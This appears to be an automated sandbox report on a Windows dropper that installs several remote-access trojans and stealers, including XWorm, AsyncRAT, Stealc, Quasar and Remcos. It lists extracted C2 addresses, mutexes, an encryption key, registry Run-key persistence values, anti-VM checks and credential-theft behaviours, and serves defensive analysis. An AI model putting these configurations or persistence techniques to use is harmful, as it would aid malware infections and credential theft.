ammyyadmin | 16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267

max time kernel
78s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
26-11-2024 22:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4363463463464363463463463.exe
Size

10KB
MD5

2a94f3960c58c6e70826495f76d00b85
SHA1

e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256

2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512

fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
SSDEEP

192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Malware Config

Extracted

Family

xworm

Version

5.0

police-turkish.gl.at.ply.gg:46359

Mutex

98LKJ8osZWR75pSw

Attributes

install_file
USB.exe

aes.plain

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

107.175.202.158:6606

107.175.202.158:30814

107.175.202.158:25565

107.175.202.158:443

Mutex

anQK5EUHL5vU

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

stealc

Botnet

QLL

http://85.28.47.70

Attributes

url_path
/744f169d372be841.php

Extracted

Family

quasar

Version

1.4.1

Botnet

Aquarius

192.168.8.103:4782

192.168.8.105:4782

192.168.8.114:4782

Mutex

a198a147-9efc-419d-9539-bac2108dc109

Attributes

encryption_key
4CF458F992C472DE78F317085B34A8A1747FC32D
install_name
WindowsDataUpdater.exe
log_directory
Logs
reconnect_delay
3000
startup_key
WindowsDataUpdater
subdirectory
WinBioData

Extracted

Family

remcos

Botnet

RemoteHost

liveos.zapto.org:2404

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
tst
delete_file
false
hide_file
true
hide_keylog_file
false
install_flag
true
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-Y7B4RN
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Ammyy Admin
Remote admin tool with various capabilities.
rat ammyyadmin

AmmyyAdmin payload 1 IoCs

resource	yara_rule
behavioral2/files/0x001000000001da59-4680.dat	family_ammyyadmin

Ammyyadmin family
ammyyadmin
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0007000000023cc3-16.dat	family_xworm
behavioral2/memory/524-24-0x00000000007C0000-0x00000000007CE000-memory.dmp	family_xworm

FlawedAmmyy RAT
Remote-access trojan based on leaked code for the Ammyy remote admin software.
trojan flawedammyy
Flawedammyy family
flawedammyy
Phorphiex family
phorphiex

Phorphiex payload 1 IoCs

resource	yara_rule
behavioral2/files/0x0009000000023ce0-603.dat	family_phorphiex

Phorphiex, Phorpiex
Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
worm trojan loader phorphiex
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0007000000023da6-618.dat	family_quasar
behavioral2/memory/360-719-0x0000000000770000-0x0000000000A94000-memory.dmp	family_quasar

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral2/files/0x0008000000023cc4-37.dat	family_asyncrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	hhnjqu9y.exe

Adds policy Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Rmc-Y7B4RN = "\"C:\\ProgramData\\tst\\remcos.exe\""	remcos.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	file.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Rmc-Y7B4RN = "\"C:\\ProgramData\\tst\\remcos.exe\""	file.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	remcos.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5864	powershell.exe
4284	powershell.exe
4316	powershell.exe
4184	powershell.exe
1816	powershell.exe
1948	powershell.exe
3116	powershell.exe
4352	powershell.exe
5464	powershell.exe
4676	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	WindowsDefenderUpdater.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Uses browser remote debugging 2 TTPs 10 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
2560	msedge.exe
1916	chrome.exe
3192	chrome.exe
1852	chrome.exe
5396	chrome.exe
3968	msedge.exe
2140	chrome.exe
5996	msedge.exe
5020	msedge.exe
1664	msedge.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	hhnjqu9y.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	hhnjqu9y.exe

Checks computer location settings 2 TTPs 14 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	VBVEd6f.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	contorax.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	4363463463464363463463463.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	file.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	86635797.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Aquarius.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	7cl16anh.exe

Clipboard Data 1 TTPs 4 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
2628	cmd.exe
1964	powershell.exe
4036	cmd.exe
5456	powershell.exe

Executes dropped EXE 47 IoCs

pid	Process
3604	test8.exe
524	svchost.exe
4736	BeamNG.UI.exe
1900	5447jsX.exe
4824	VBVEd6f.exe
3964	maza-0.16.3-win64-setup-unsigned.exe
5712	Aquarius.exe
5840	o.exe
1220	file.exe
3120	WindowsDefenderUpdater.exe
360	WindowsDataUpdater.exe
5812	java.exe
5928	WindowsDefenderUpdater.exe
3392	remcos.exe
1736	sysnldcvmr.exe
1724	hhnjqu9y.exe
5860	7cl16anh.exe
4980	WindowsDefenderUpdater.exe
5912	WindowsDataUpdater.exe
4440	WindowsDefenderUpdater.exe
5800	java.exe
3992	WindowsDefenderUpdater.exe
2876	WindowsDataUpdater.exe
664	WindowsDefenderUpdater.exe
5312	java.exe
648	86635797.exe
1280	Identifications.exe
3168	contorax.exe
3324	winmsbt.exe
5436	WindowsDefenderUpdater.exe
5192	WindowsDataUpdater.exe
5580	java.exe
4260	WindowsDefenderUpdater.exe
5936	WindowsDefenderUpdater.exe
4732	WindowsDataUpdater.exe
5448	java.exe
5856	WindowsDefenderUpdater.exe
2256	WindowsDefenderUpdater.exe
5688	WindowsDataUpdater.exe
2252	java.exe
5640	WindowsDefenderUpdater.exe
1840	rar.exe
3364	1757527941.exe
1260	WindowsDefenderUpdater.exe
5864	WindowsDataUpdater.exe
5268	java.exe
6064	WindowsDefenderUpdater.exe

Loads dropped DLL 64 IoCs

pid	Process
3964	maza-0.16.3-win64-setup-unsigned.exe
3964	maza-0.16.3-win64-setup-unsigned.exe
3964	maza-0.16.3-win64-setup-unsigned.exe
5928	WindowsDefenderUpdater.exe
5928	WindowsDefenderUpdater.exe
5928	WindowsDefenderUpdater.exe
5928	WindowsDefenderUpdater.exe
5928	WindowsDefenderUpdater.exe
5928	WindowsDefenderUpdater.exe
5928	WindowsDefenderUpdater.exe
5928	WindowsDefenderUpdater.exe
5928	WindowsDefenderUpdater.exe
5928	WindowsDefenderUpdater.exe
5928	WindowsDefenderUpdater.exe
5928	WindowsDefenderUpdater.exe
5928	WindowsDefenderUpdater.exe
5928	WindowsDefenderUpdater.exe
5928	WindowsDefenderUpdater.exe
5928	WindowsDefenderUpdater.exe
5928	WindowsDefenderUpdater.exe
5928	WindowsDefenderUpdater.exe
4440	WindowsDefenderUpdater.exe
4440	WindowsDefenderUpdater.exe
4440	WindowsDefenderUpdater.exe
4440	WindowsDefenderUpdater.exe
4440	WindowsDefenderUpdater.exe
4440	WindowsDefenderUpdater.exe
4440	WindowsDefenderUpdater.exe
4440	WindowsDefenderUpdater.exe
4440	WindowsDefenderUpdater.exe
4440	WindowsDefenderUpdater.exe
4440	WindowsDefenderUpdater.exe
4440	WindowsDefenderUpdater.exe
4440	WindowsDefenderUpdater.exe
4440	WindowsDefenderUpdater.exe
4440	WindowsDefenderUpdater.exe
4440	WindowsDefenderUpdater.exe
664	WindowsDefenderUpdater.exe
664	WindowsDefenderUpdater.exe
664	WindowsDefenderUpdater.exe
664	WindowsDefenderUpdater.exe
664	WindowsDefenderUpdater.exe
664	WindowsDefenderUpdater.exe
664	WindowsDefenderUpdater.exe
664	WindowsDefenderUpdater.exe
664	WindowsDefenderUpdater.exe
664	WindowsDefenderUpdater.exe
664	WindowsDefenderUpdater.exe
664	WindowsDefenderUpdater.exe
664	WindowsDefenderUpdater.exe
664	WindowsDefenderUpdater.exe
664	WindowsDefenderUpdater.exe
664	WindowsDefenderUpdater.exe
664	WindowsDefenderUpdater.exe
4260	WindowsDefenderUpdater.exe
4260	WindowsDefenderUpdater.exe
4260	WindowsDefenderUpdater.exe
4260	WindowsDefenderUpdater.exe
4260	WindowsDefenderUpdater.exe
4260	WindowsDefenderUpdater.exe
4260	WindowsDefenderUpdater.exe
4260	WindowsDefenderUpdater.exe
4260	WindowsDefenderUpdater.exe
4260	WindowsDefenderUpdater.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Themida packer 2 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/files/0x0007000000023dab-789.dat	themida
behavioral2/memory/1724-819-0x0000000000190000-0x0000000000A0E000-memory.dmp	themida

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 34 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-Y7B4RN = "\"C:\\ProgramData\\tst\\remcos.exe\""	file.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-Y7B4RN = "\"C:\\ProgramData\\tst\\remcos.exe\""	remcos.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe"	o.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-Y7B4RN = "\"C:\\ProgramData\\tst\\remcos.exe\""	file.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-Y7B4RN = "\"C:\\ProgramData\\tst\\remcos.exe\""	remcos.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Subsystem Framework = "\"C:\\ProgramData\\Microsoft Subsystem Framework\\winmsbt.exe\""	winmsbt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe"	reg.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	hhnjqu9y.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs

Web Service

T1102

flow	ioc
236	discord.com
237	discord.com
18	raw.githubusercontent.com
19	raw.githubusercontent.com
145	pastebin.com
146	pastebin.com
154	discord.com
155	discord.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
135	ip-api.com
152	ip-api.com
180	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Drops file in System32 directory 30 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\java.exe	cmd.exe
File opened for modification	C:\Windows\system32\java.exe	cmd.exe
File opened for modification	C:\Windows\system32\java.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File created	C:\Windows\system32\java.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File created	C:\Windows\system32\java.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File created	C:\Windows\system32\java.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe

Enumerates processes with tasklist 1 TTPs 12 IoCs

discovery

Process Discovery

T1057

pid	Process
5456	tasklist.exe
2028	tasklist.exe
4540	tasklist.exe
2028	tasklist.exe
1836	tasklist.exe
3216	tasklist.exe
1632	tasklist.exe
576	tasklist.exe
6088	tasklist.exe
4484	tasklist.exe
5776	tasklist.exe
5528	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
1724	hhnjqu9y.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1900 set thread context of 940	1900	5447jsX.exe	97
PID 3392 set thread context of 5248	3392	remcos.exe	146

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/5928-735-0x00007FFA58A50000-0x00007FFA58EB5000-memory.dmp	upx
behavioral2/files/0x0007000000023de6-729.dat	upx
behavioral2/memory/5928-755-0x00007FFA6EF70000-0x00007FFA6EF7F000-memory.dmp	upx
behavioral2/memory/5928-754-0x00007FFA6BF80000-0x00007FFA6BFA4000-memory.dmp	upx
behavioral2/files/0x0007000000023de4-752.dat	upx
behavioral2/files/0x0007000000023db3-750.dat	upx
behavioral2/memory/5928-770-0x00007FFA65270000-0x00007FFA6529C000-memory.dmp	upx
behavioral2/memory/5928-772-0x00007FFA65230000-0x00007FFA6524E000-memory.dmp	upx
behavioral2/memory/5928-773-0x00007FFA58580000-0x00007FFA586F1000-memory.dmp	upx
behavioral2/memory/5928-771-0x00007FFA65250000-0x00007FFA65268000-memory.dmp	upx
behavioral2/memory/5928-774-0x00007FFA5F8C0000-0x00007FFA5F8D9000-memory.dmp	upx
behavioral2/memory/5928-776-0x00007FFA58550000-0x00007FFA5857E000-memory.dmp	upx
behavioral2/memory/5928-775-0x00007FFA6E510000-0x00007FFA6E51D000-memory.dmp	upx
behavioral2/memory/5928-778-0x00007FFA57210000-0x00007FFA572C7000-memory.dmp	upx
behavioral2/memory/5928-783-0x00007FFA5F8A0000-0x00007FFA5F8B5000-memory.dmp	upx
behavioral2/memory/5928-784-0x00007FFA570F0000-0x00007FFA57208000-memory.dmp	upx
behavioral2/memory/5928-782-0x00007FFA6E060000-0x00007FFA6E06D000-memory.dmp	upx
behavioral2/memory/5928-781-0x00007FFA6BF80000-0x00007FFA6BFA4000-memory.dmp	upx
behavioral2/memory/5928-780-0x00007FFA569A0000-0x00007FFA56D17000-memory.dmp	upx
behavioral2/memory/5928-777-0x00007FFA58A50000-0x00007FFA58EB5000-memory.dmp	upx
behavioral2/memory/5928-827-0x00007FFA65230000-0x00007FFA6524E000-memory.dmp	upx
behavioral2/memory/5928-828-0x00007FFA58580000-0x00007FFA586F1000-memory.dmp	upx
behavioral2/memory/4440-901-0x00007FFA505E0000-0x00007FFA50A45000-memory.dmp	upx
behavioral2/memory/4440-906-0x00007FFA65220000-0x00007FFA6522F000-memory.dmp	upx
behavioral2/memory/4440-905-0x00007FFA579E0000-0x00007FFA57A04000-memory.dmp	upx
behavioral2/memory/5928-904-0x00007FFA5F8C0000-0x00007FFA5F8D9000-memory.dmp	upx
behavioral2/memory/4440-924-0x00007FFA64B70000-0x00007FFA64B7D000-memory.dmp	upx
behavioral2/memory/4440-923-0x00007FFA56720000-0x00007FFA56739000-memory.dmp	upx
behavioral2/memory/4440-930-0x00007FFA56240000-0x00007FFA56255000-memory.dmp	upx
behavioral2/memory/4440-938-0x00007FFA56740000-0x00007FFA5675E000-memory.dmp	upx
behavioral2/memory/4440-948-0x00007FFA4FDA0000-0x00007FFA50117000-memory.dmp	upx
behavioral2/memory/4440-947-0x00007FFA50120000-0x00007FFA50291000-memory.dmp	upx
behavioral2/memory/4440-946-0x00007FFA57FB0000-0x00007FFA57FBD000-memory.dmp	upx
behavioral2/memory/4440-945-0x00007FFA56240000-0x00007FFA56255000-memory.dmp	upx
behavioral2/memory/4440-942-0x00007FFA562D0000-0x00007FFA562FE000-memory.dmp	upx
behavioral2/memory/4440-941-0x00007FFA64B70000-0x00007FFA64B7D000-memory.dmp	upx
behavioral2/memory/4440-937-0x00007FFA57CE0000-0x00007FFA57CF8000-memory.dmp	upx
behavioral2/memory/4440-936-0x00007FFA56760000-0x00007FFA5678C000-memory.dmp	upx
behavioral2/memory/4440-935-0x00007FFA65220000-0x00007FFA6522F000-memory.dmp	upx
behavioral2/memory/4440-934-0x00007FFA579E0000-0x00007FFA57A04000-memory.dmp	upx
behavioral2/memory/4440-932-0x00007FFA57FB0000-0x00007FFA57FBD000-memory.dmp	upx
behavioral2/memory/4440-931-0x00007FFA505E0000-0x00007FFA50A45000-memory.dmp	upx
behavioral2/memory/4440-944-0x00007FFA4FCE0000-0x00007FFA4FD97000-memory.dmp	upx
behavioral2/memory/4440-940-0x00007FFA56720000-0x00007FFA56739000-memory.dmp	upx
behavioral2/memory/4440-933-0x00007FFA505E0000-0x00007FFA50A45000-memory.dmp	upx
behavioral2/memory/4440-927-0x00007FFA4FDA0000-0x00007FFA50117000-memory.dmp	upx
behavioral2/memory/4440-926-0x00007FFA4FCE0000-0x00007FFA4FD97000-memory.dmp	upx
